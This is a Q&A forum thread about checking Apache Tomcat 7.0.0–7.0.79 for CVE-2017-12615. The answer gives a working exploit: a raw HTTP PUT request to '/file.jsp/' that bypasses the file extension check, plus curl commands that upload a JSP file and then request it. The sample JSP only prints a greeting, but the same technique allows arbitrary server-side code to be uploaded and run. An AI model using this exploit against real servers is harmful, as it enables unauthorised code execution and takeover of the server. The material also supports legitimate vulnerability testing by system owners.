0 votes

How can I check the vulnerability for Apache Tomcat 7.0.0 to 7.0.79 (CVE-2017-12615)?

by (111 points)

1 Answer

0 votes

You can bypass the file extension check by inserting a '/' character after the filename's extension.

HTTP Request:

PUT /file.jsp/

Host: localhost:port

Connection: close

Content-Length: 85

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

Expected response if successful

HTTP/1.1 201 Created

Server: Apache-Coyote/1.1

Content-Length: 0

Date: Sat, 23 Sep 2017 06:36:36 GMT

Connection: close

Exploit using 'curl':

Create a .jsp file (e.g. testfile.jsp):

<% out.write("<html><body><h3>[+] Hello from codeshikari.</h3></body></html>"); %>

cURL command on target server:

curl -X PUT http://localhost:port/testfile.jsp/ -d @- < testfile.jsp

Check the file by browsing to the target address or:

curl http://localhost:port/testfile.jsp

by (147 points)
...